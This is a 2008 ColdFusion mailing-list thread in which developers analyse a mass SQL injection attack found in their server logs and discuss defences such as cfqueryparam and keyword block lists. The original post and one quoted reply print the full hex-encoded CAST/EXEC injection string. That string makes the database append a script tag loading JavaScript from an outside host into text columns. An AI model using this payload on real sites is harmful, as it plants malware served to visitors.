|
|
Home /
Groups /
ColdFusion Talk (CF-Talk)
(ot) URL Hack Attempt Leaves Me Scractching My Head
Just was looking at a 'user monitor' page on one of my sites and I saw theChe Vilnonis 07/21/08 10:55 A This is a popular and very malicious SQL injection attack that is making theMark Kruger 07/21/08 11:00 A This is some sort of encoding... Like Bin Hex, Spammers use it to obscureGerald Guido 07/21/08 11:01 A I am seeing these too on our site, in errors generated by bad data goingJosh Nathanson 07/21/08 12:36 P We're getting hit hard today with this. They're failing, because weKris Jones 07/21/08 12:55 P >>We're getting hit hard today with this.Gerald Guido 07/21/08 01:04 P It'll show in your logs of course. We also have error reports thatKris Jones 07/21/08 02:00 P We're getting hit with this attack via a wide range of hosted domains, andAndy Matthews 07/21/08 03:41 P >>If several people on this list are seeing this attack, it must be prettyClaude Schneegans 07/21/08 03:11 P >Just was looking at a 'user monitor' page on one of my sites and I saw thejames carberry 07/21/08 01:55 P Even easier than monkeying with every single one of your cfquery's.... just add following line to the TOP of all your application.cfm's:james carberry 07/21/08 01:58 P And what about my page exec(.cfm?! :ODAdrian Lynch 07/24/08 09:11 A Just put the following line at the TOP of your application.cfm to innoculate your CF webs against this attack:james carberry 07/21/08 02:43 P I went to look at a site I do side work for and they got hit. No... not myGerald Guido 07/21/08 07:52 P >Just was looking at a 'user monitor' page on one of my sites and I saw theAndreas Ertle 07/22/08 04:50 A This attack has nothing to do with elevation of privilege. It simplyKris Jones 07/22/08 08:13 A The purpose of the hack is to change your website, so that each visitor isJerry Johnson 07/22/08 08:40 A Doooooooh!Jesse Beckton 07/22/08 10:26 P I just got hit by this on one of my older sites (inconsistent use ofPete Ruckelshaus 07/25/08 09:47 P Read this:Brad Wood 07/21/08 11:07 A Why bother looking around the internet? Use your SQL server to decodeBrad Wood 07/21/08 11:10 A >>Why bother looking around the internet? Use your SQL server to decode it!Gerald Guido 07/21/08 11:14 A Tried printing the code in SQL Analyzer and got nothing. Can anyoneChe Vilnonis 07/21/08 11:33 A Can we please stop distributing this script ;)Dave Francis 07/21/08 11:42 A Good point. My bad...Che Vilnonis 07/21/08 11:44 A Works great for me. You have to remove the extra line breaks though.Brad Wood 07/21/08 11:45 A Yep, read the post. Must have been the line breaks that messed things up.Che Vilnonis 07/21/08 11:58 A Mutha!!!Andy Matthews 07/21/08 12:21 P We had the same hack on our site, did you guys figure out exactly what happened or how and where the sql was ran? or what the hackers purpose was?Wayne Janeck 07/21/08 02:47 P Brad,Heikki Heikkinen 07/21/08 06:12 P I appreciate your concern, but I'm pretty certain the bad people outBrad Wood 07/21/08 11:50 A >>Drop database fooGerald Guido 07/21/08 12:16 P Good on ya, mate. If there were an award for using cfqueryparam I wouldBrad Wood 07/21/08 01:10 P I was just looking into that myself.Joshua Cyr 07/21/08 01:11 P >I was just looking into that myself.Matthew Smith 07/24/08 03:05 P +1Che Vilnonis 07/21/08 01:14 P Sweet nectar... I'm trying this out and blogging it tonight. If it'sBrad Wood 07/21/08 01:15 P > Even easier than monkeying with every single one of yourDave Watts 07/21/08 02:02 P Dave...Andy Matthews 07/21/08 03:36 P >>What other ways are there? I know of two: EXEC and EXECUTEClaude Schneegans 07/21/08 03:44 P I'm just talking about executing SQL, not SQL injection methods.Andy Matthews 07/21/08 03:50 P Band-Aids and duct tape...Brad Wood 07/21/08 02:02 P The hacker's hope is that you will be outputting one of those varcharBrad Wood 07/21/08 02:53 P Just an FYI...Andy Matthews 07/21/08 03:40 P And embedded in his code is one of the "other" ways of executing SQL - usingMark Kruger 07/21/08 03:44 P For me, all attempts are focusing on rss.cfm. Another post said they sawChe Vilnonis 07/21/08 04:06 P We've been dealing with these too - to address Che's question they wereMark Atkinson 07/21/08 04:17 P The attempts are based on a google search of .cfm files with parameters thatJerry Johnson 07/21/08 04:17 P We got hit, and, according to the IIS logs, they hit non-standard templates in varied directories:Cameron Johnson 07/21/08 04:23 P I can confirm that many templates in our site are being hit. And theyKris Jones 07/21/08 04:28 P > The hacker's hope is that you will be outputting one of thoseDave Watts 07/21/08 03:03 P For those of you who have been hit by this attack and who need to tryMark Kruger 07/21/08 03:33 P Mark,Heikki Heikkinen 07/21/08 05:22 P One of my websites got hit.. I always useAl Musella, DPM 07/23/08 06:18 P however, one of the owners got banned whenBrad Wood 07/23/08 06:24 P >>This is a classic reason why that sort of blocking methodClaude Schneegans 07/24/08 09:09 A I'd be leery of simply looking for the word cast, or declare, or exec byAndy Matthews 07/24/08 09:18 A Add one to the list. One of my old sites just got brought down. We restoredRobert Harrison 07/24/08 09:47 A Hi Dave,Martin Schmelzle 07/23/08 03:43 P For what it's worth, the specific URL that was injected in the sample IBrad Wood 07/21/08 03:11 P >>For what it's worth, the specific URL that was injected in the sample IClaude Schneegans 07/21/08 03:27 P I took the time to save out all of the code from the JS file that wasAndy Matthews 07/21/08 03:41 P I have all of the js files open and saved to a text file, fwiw, from thisJerry Johnson 07/21/08 04:14 P Brad/dave,Mark Kruger 07/21/08 03:42 P > Until now, I just check for strings "http" or "user" inDave Watts 07/21/08 03:28 P >>That's fine, until the attack pattern contains something else, likeClaude Schneegans 07/21/08 03:42 P ....and all hackers ALWAYS use the same IP....cause they'd never getBryan Stevenson 07/21/08 04:04 P >>.....and all hackers ALWAYS use the same IP....cause they'd never getClaude Schneegans 07/21/08 04:41 P Ahhh...so there were other reasons for doing what you are doing....thatBryan Stevenson 07/21/08 06:18 P >>....and no...not retarded....just tactlessClaude Schneegans 07/21/08 09:13 P >>I too was concerned about your solution beingClaude Schneegans 07/21/08 09:50 P Easy. sp_executesqlBrad Wood 07/21/08 04:07 P > Yeah, that suck, I was going to dissect it. It appears thatDave Watts 07/21/08 04:30 P Here's another question. Are sites that rewrite URLs (i.e., no .cfmChe Vilnonis 07/21/08 04:40 P No, because those sites are still using the URL variables, just not visibly.Andy Matthews 07/22/08 09:08 A I saw this on the Riaforge update today. Looks like a SQL Jimmy wrapper forGerald Guido 07/22/08 09:25 A Let me just jump in with a quick question or two about this...Rick Faircloth 07/22/08 09:48 A > Not from the same address though, because it is banned now.Dave Watts 07/21/08 04:37 P >>This appears to be a botnet-driven attack. Blocking addresses may beClaude Schneegans 07/21/08 04:56 P Did I really just read that? Please, someone, anyone, tell me that IMatt Quackenbush 07/21/08 05:24 P And for those of you who take this advice and DO use cfqueryparamExperienced CF Developer 07/21/08 05:34 P Dear Dave Phillips, you have made a generalisation and I have a dissentingAdrian Lynch 07/24/08 09:38 A Adrian,Dave Phillips 07/24/08 10:09 A >>In our case, whatClaude Schneegans 07/24/08 10:55 A On Thu, Jul 24, 2008 at 10:52 AM, Claude Schneegans <Jim Wright 07/24/08 11:12 A >>It shouldn't make a difference if the SELECT * is in a cfqueryClaude Schneegans 07/24/08 11:24 A This is not the only case. If you use pooled statements on theJames Holmes 07/24/08 11:40 A On Thu, Jul 24, 2008 at 11:20 AM, Claude Schneegans <Jim Wright 07/24/08 02:22 P As a rule I use cfqueryparam. And generally try to stick to storedKris Jones 07/21/08 06:21 P >>Bottom line: ***always*** use cfqueryparam. Period. There are noClaude Schneegans 07/21/08 09:40 P Regarding performance... On high traffic sites with a good SQL serverMark Kruger 07/21/08 10:07 P Always sanitize your data entry.Gerald Guido 07/21/08 10:28 P >Not dissing anyone. Just curious. With all the ORM's and code generators outMary Jo Sminkey 07/23/08 11:18 A Ok, I understand why you think it's ridiculous, but here's a reason to doAdrian Lynch 07/24/08 09:42 A >>and Billy New-Developer comes along and decides thatClaude Schneegans 07/24/08 09:57 A But Billy has been told to turn:Adrian Lynch 07/24/08 10:13 A >>But Billy has been told to turn:Claude Schneegans 07/24/08 10:46 A Do you fully understand what cfqueryparam does when binding textJames Holmes 07/24/08 10:14 A >>Do you fully understand what cfqueryparam does when binding textClaude Schneegans 07/24/08 11:01 A Try telling that to Billy, he just got fired!Adrian Lynch 07/24/08 11:11 A So you know that it *always* prevents SQL injection in a standardJames Holmes 07/24/08 11:43 A >>So you know that it *always* prevents SQL injection in a standardClaude Schneegans 07/24/08 11:48 A I'll say it again.James Holmes 07/24/08 11:59 A Obviously cfsqltype="varchar" should be cfsqltype="cf_sql_varchar" (my typo).James Holmes 07/24/08 12:00 P Jeez, and value="URL.TryToHackThis" should be value="#URL.TryToHackThis#"James Holmes 07/24/08 12:08 P >>Jeez, and value="URL.TryToHackThis" should be value="#URL.TryToHackThis#"Claude Schneegans 07/24/08 12:18 P >>ANY string passed into cfqueryparam cannot be executed as SQL:Claude Schneegans 07/24/08 12:17 P Closing the apostrophe is exactly how SQL injection occurs with text fieldBrad Wood 07/24/08 12:26 P >>Closing the apostrophe is exactly how SQL injection occurs with textClaude Schneegans 07/24/08 12:36 P Not if you use MySQL. That DBMS allows for an alternative way to escapeBrad Wood 07/24/08 12:42 P >>Not if you use MySQL. That DBMS allows for an alternative way to escapeClaude Schneegans 07/24/08 01:02 P That's fair enough from a security stand point, but I still use cfqueryparamBrad Wood 07/24/08 01:46 P >>When your database executes a SQL statement, it generates anClaude Schneegans 07/24/08 01:54 P >>For those of you who are actually trying to learn and become betterClaude Schneegans 07/21/08 10:01 P > What other ways are there? I know of two: EXEC and EXECUTE.Dave Watts 07/21/08 04:40 P > Why do you all want to interpret this as a final solution?Dave Watts 07/21/08 05:25 P Hmm, I sure hope you replaced the exec with a print statement....Brad Wood 07/21/08 06:24 P Cache result sets manually. You can wrap that up nicely in a customBrad Wood 07/21/08 06:26 P > We are going to be reading about this on all the tech ragsDave Watts 07/21/08 08:06 P Firewall solution is another way, we block anything in the url with CAST( ORDan Vega 07/21/08 08:33 P If you are still being affected by the attack, then you still have one orBrad Wood 07/23/08 07:51 P What about if I put:Radek Valachovic 07/23/08 08:33 P Excuse me... But why are you checking script_name and Path_info for "EXEC("Mark Kruger 07/23/08 09:52 P With this latest spate of SQL attacks it has at least alerted CF (and non CFGabriel 07/23/08 10:53 P Gabriel,Mark Kruger 07/23/08 11:17 P Mark,Gabriel 07/24/08 12:19 A Thanks for that link Gabriel. I'm sure it was intended for black hats, butBrad Wood 07/24/08 12:34 A Gabriel,Mark Kruger 07/24/08 08:56 A >>var listSQLInject =Claude Schneegans 07/24/08 09:16 A Do you think when I am using cfqueryparams for example with numbers likeRadek Valachovic 07/24/08 01:15 P Radek, what you did is exactly correct. (Well, some people might bust yourBrad Wood 07/24/08 01:39 P Yeah I was reading in the forum this one, that using SELECT * is not good,Radek Valachovic 07/24/08 01:52 P On Thu, Jul 24, 2008 at 10:48 AM, Radek Valachovic <rentgeeen@gmail.com>Charlie Griefer 07/24/08 02:03 P What would you suggest for this kind of thing:Radek Valachovic 07/24/08 02:22 P Whatever the length of the column in your DB.Adrian Lynch 07/24/08 02:25 P Okay what about this, for example column name ITEMOID has in DB maxlenght 15Radek Valachovic 07/24/08 02:59 P Correction sql should be in the text:Radek Valachovic 07/24/08 03:04 P Radek,Cutter (CFRelated) 07/24/08 03:09 P Your max length in this scenario should most likely be the size of theBrad Wood 07/24/08 02:26 P MAXLENGTH would typically be the maximum the underlying table allows or theBen Forta 07/24/08 02:26 P So if I wont use maxlenght still it is gonna be secured? thanksRadek Valachovic 07/24/08 02:30 P Absolutely. Minimally, just using a cfqueryparam tag with the valueBrad Wood 07/24/08 02:34 P It will be secured, but it is better IMO to use the maxlength attribute.Bryan Hogan 07/24/08 02:36 P Charlie Griefer wrote:Ian Skinner 07/24/08 02:31 P What Charlie says is correct. To elaborate on the performance part..Brad Wood 07/24/08 02:52 P Using CFQUERYPARAM will secure your DB calls. That doesn't mean you don'tMark Kruger 07/24/08 01:40 P Second to last sentence should ready .... "you are safe from damage to theMark Kruger 07/24/08 01:53 P That may help with this particular attack, but I already have seen 2Al Musella, DPM 07/23/08 09:53 P Good list al - but I have a couple of revisions for you :)Mark Kruger 07/23/08 10:02 P My thinking is:Al Musella, DPM 07/23/08 11:42 P >>Keywords and banning IPs by themselves are not the answerClaude Schneegans 07/24/08 09:22 A Al Musella, DPM wrote:Jochem van Dieten 07/24/08 03:13 P I won't mention names but a few popular websites I use have beenAl Musella, DPM 07/25/08 06:40 P What if the hacker puts a space between EXEC and the (?Andy Matthews 07/24/08 09:22 A > Ok, this is another example where CFQP is useful, as the doc says.Dave Watts 07/24/08 02:00 P >>If you don't really careClaude Schneegans 07/24/08 02:06 P > A very particular situation though. It will not prevent meDave Watts 07/24/08 02:05 P >>it's safe to say that avoiding "*" is a good idea,Claude Schneegans 07/24/08 02:16 P Fine, it's always a good idea to never use *Ben Forta 07/24/08 02:18 P This is starting to sound like a bad multiple choice question from a collegeBrad Wood 07/24/08 02:23 P (Brad) >>This is starting to sound like a bad multiple choice question fromDave Phillips 07/24/08 02:36 P Dave Phillips wrote:Ian Skinner 07/24/08 03:03 P > It may be a silly question, but why a SELECT * will brakeDave Watts 07/24/08 02:07 P > So if I wont use maxlenght still it is gonna be secured?Dave Watts 07/24/08 02:31 P Interesting question:Radek Valachovic 07/25/08 07:29 P > > If you don't really careDave Watts 07/24/08 02:36 P > How can it be processed when USER_ID in database isDave Watts 07/24/08 03:04 P Great, yes understand, basically it runs another script against database soRadek Valachovic 07/24/08 03:09 P I noticed since I started securing the site also with tha cfif EXEC, I haveRadek Valachovic 07/24/08 03:12 P > If I do find any vunerabilities, is there something I can runDave Watts 07/24/08 03:37 P Yes Exactly, Run the current attack, I am doing it to see how am I securingRadek Valachovic 07/24/08 03:40 P I set up a scheduled task to check my database every 15 minutes. ItAl Musella, DPM 07/25/08 06:55 P > Interesting question:Dave Watts 07/26/08 12:49 A Just was looking at a 'user monitor' page on one of my sites and I saw the url string below being called. I've seen several sql injection urls before, but what the heck are they trying to accomplish here? Eeverything is cfqueryparam'ed. Thanks, Che /rss.cfm?';DECLARE @S CHAR(4000);SET @S=CAST(0x4445434C415245204054207661726368617228323535292C404320766172636861 72283430303029204445434C415245205461626C655F437572736F7220435552534F5220464F 522073656C65637420612E6E616D652C622E6E616D652066726F6D207379736F626A65637473 20612C737973636F6C756D6E73206220776865726520612E69643D622E696420616E6420612E 78747970653D27752720616E642028622E78747970653D3939206F7220622E78747970653D33 35206F7220622E78747970653D323331206F7220622E78747970653D31363729204F50454E20 5461626C655F437572736F72204645544348204E4558542046524F4D20205461626C655F4375 72736F7220494E544F2040542C4043205748494C4528404046455443485F5354415455533D30 2920424547494E20657865632827757064617465205B272B40542B275D20736574205B272B40 432B275D3D5B272B40432B275D2B2727223E3C2F7469746C653E3C736372697074207372633D 22687474703A2F2F312E766572796E782E636E2F772E6A73223E3C2F7363726970743E3C212D 2D272720776865726520272B40432B27206E6F74206C696B6520272725223E3C2F7469746C65 3E3C736372697074207372633D22687474703A2F2F312E766572796E782E636E2F772E6A7322 3E3C2F7363726970743E3C212D2D272727294645544348204E4558542046524F4D2020546162 6C655F437572736F7220494E544F2040542C404320454E4420434C4F5345205461626C655F43 7572736F72204445414C4C4F43415445205461626C655F437572736F72 AS CHAR(4000));EXEC(@S); This is a popular and very malicious SQL injection attack that is making the rounds: http://www.coldfusionmuse.com/index.cfm/2008/7/18/Injection-Using-CAST-And-A SCII -Mark Mark A. Kruger, CFG, MCSE (402) 408-3733 ext 105 www.cfwebtools.com www.coldfusionmuse.com www.necfug.com Just was looking at a 'user monitor' page on one of my sites and I saw the url string below being called. I've seen several sql injection urls before, but what the heck are they trying to accomplish here? Eeverything is cfqueryparam'ed. Thanks, Che /rss.cfm?';DECLARE @S CHAR(4000);SET @S=CAST(0x4445434C415245204054207661726368617228323535292C404320766172636861 72283430303029204445434C415245205461626C655F437572736F7220435552534F5220464F 522073656C65637420612E6E616D652C622E6E616D652066726F6D207379736F626A65637473 20612C737973636F6C756D6E73206220776865726520612E69643D622E696420616E6420612E 78747970653D27752720616E642028622E78747970653D3939206F7220622E78747970653D33 35206F7220622E78747970653D323331206F7220622E78747970653D31363729204F50454E20 5461626C655F437572736F72204645544348204E4558542046524F4D20205461626C655F4375 72736F7220494E544F2040542C4043205748494C4528404046455443485F5354415455533D30 2920424547494E20657865632827757064617465205B272B40542B275D20736574205B272B40 432B275D3D5B272B40432B275D2B2727223E3C2F7469746C653E3C736372697074207372633D 22687474703A2F2F312E766572796E782E636E2F772E6A73223E3C2F7363726970743E3C212D 2D272720776865726520272B40432B27206E6F74206C696B6520272725223E3C2F7469746C65 3E3C736372697074207372633D22687474703A2F2F312E766572796E782E636E2F772E6A7322 3E3C2F7363726970743E3C212D2D272727294645544348204E4558542046524F4D2020546162 6C655F437572736F7220494E544F2040542C404320454E4420434C4F5345205461626C655F43 7572736F72204445414C4C4F43415445205461626C655F437572736F72 AS CHAR(4000));EXEC(@S); This is some sort of encoding... Like Bin Hex, Spammers use it to obscure urls and such. Computers read it just fine. If you look around on the internets you can find a decoder to render it to human readable form. You just need to figure out what sort of encoding they are using ----- Excess quoted text cut - see Original Post for more ----- I am seeing these too on our site, in errors generated by bad data going into a cfqueryparam. If several people on this list are seeing this attack, it must be pretty widespread. -- Josh ----- Excess quoted text cut - see Original Post for more ----- We're getting hit hard today with this. They're failing, because we use cfqueryparam and cfprocparam. But it is quite annoying. -KJ >>We're getting hit hard today with this. >>/rss.cfm? Is is just rss.cfm? I haven't looked at our logs yet. Where did you see this. The server log files? ~~G~~ > We're getting hit hard today with this. They're failing, because we > use cfqueryparam and cfprocparam. But it is quite annoying. > > -KJ It'll show in your logs of course. We also have error reports that dump the error info and certain collections and mail it to the dev team. -KJ ----- Excess quoted text cut - see Original Post for more ----- We're getting hit with this attack via a wide range of hosted domains, and various files. Sitemap.cfm is a common one at this point. andy >>We're getting hit hard today with this. >>/rss.cfm? Is is just rss.cfm? I haven't looked at our logs yet. Where did you see this. The server log files? ~~G~~ > We're getting hit hard today with this. They're failing, because we > use cfqueryparam and cfprocparam. But it is quite annoying. > > -KJ > > >>If several people on this list are seeing this attack, it must be pretty widespread. Until now, I just check for strings "http" or "user" in url.id containing something else than an integer value. I now just added "DECLARE" in the validation. All my templates expecting id=<some numeric> start with this code (included): <CFIF val(id) EQ 0 AND (id CONTAINS "http" OR id CONTAINS "user" OR id CONTAINS "DECLARE")> ... save IP of this guy in the banned addresses table... </CFIF> This is even more efficient than CFQURYPARAM, because this way I'm sure the guy will not have another chance. -- _______________________________________ REUSE CODE! Use custom tags; See http://www.contentbox.com/claude/customtags/tagstore.cfm (Please send any spam to this address: piegeacon@internetique.com) Thanks. ----- Excess quoted text cut - see Original Post for more ----- >CHAR(4000));EXEC(@S); Even easier than monkeying with every single one of your cfquery's.... just add following line to the TOP of all your application.cfm's: <cfif cgi.SCRIPT_NAME contains "EXEC(" OR cgi.PATH_INFO contains "EXEC(" OR cgi.QUERY_STRING contains "EXEC("><cfabort></cfif> This will immediately shut down execution of any CFM that this piece of trash tries to invoke to execute this particular type of SQL for. peace, j ----- Excess quoted text cut - see Original Post for more ----- And what about my page exec(.cfm?! :OD Just checking my logs now and I'm getting hit by this too. cfqp'd all the way though... Even easier than monkeying with every single one of your cfquery's.... just add following line to the TOP of all your application.cfm's: <cfif cgi.SCRIPT_NAME contains "EXEC(" OR cgi.PATH_INFO contains "EXEC(" OR cgi.QUERY_STRING contains "EXEC("><cfabort></cfif> This will immediately shut down execution of any CFM that this piece of trash tries to invoke to execute this particular type of SQL for. peace, j Just put the following line at the TOP of your application.cfm to innoculate your CF webs against this attack: <cfif cgi.SCRIPT_NAME contains "EXEC(" OR cgi.PATH_INFO contains "EXEC(" OR cgi.QUERY_STRING contains "EXEC("><cfabort></cfif> peace, j ----- Excess quoted text cut - see Original Post for more ----- I went to look at a site I do side work for and they got hit. No... not my stuff. :) We are going to be reading about this on all the tech rags like Info World and Zdnet tomorrow. ZDnet will prolly post it with a H1 tag with a blink tag for good measure. One of the things about SQL server I never liked was how you could run ore than one sql script at a time. Mysql doesn't allow you to do this LTIL. cfqueryparam... me love you long time. ~G~ "If everything seems under control, you're not going fast enough" -- Mario Andretti >Just was looking at a 'user monitor' page on one of my sites and I saw the >url string below being called. I've seen several sql injection urls before, >but what the heck are they trying to accomplish here? Eeverything is >cfqueryparam'ed. Thanks, Che > >/rss.cfm?';DECLARE @S CHAR(4000);SET >@S=CAST(0x4445434C415245204054207661726368617228323535292C404320766172636861 Hello, naive question maybe, nevertheless: Can someone confirm that having applied the Microsoft patch(es) mentioned on http://www.microsoft.com/technet/security/bulletin/MS08-040.mspx is sufficient to protect against attacks like these? Who had applied the patch(es) but still was attacked and infected successfully? This attack has nothing to do with elevation of privilege. It simply tacks on a SQL procedure to a query existing on the page already. This procedure then runs through the tables/columns in the database appending text the end of content in varchar fields. The text appended varies, but what I've seen is a javascript file call, that would run when the affected content was displayed in a browser. I can't see how that security patch would have anything to do with it. (Please enlighten me if I'm wrong.) > Can someone confirm that having applied the Microsoft patch(es) mentioned on > ht |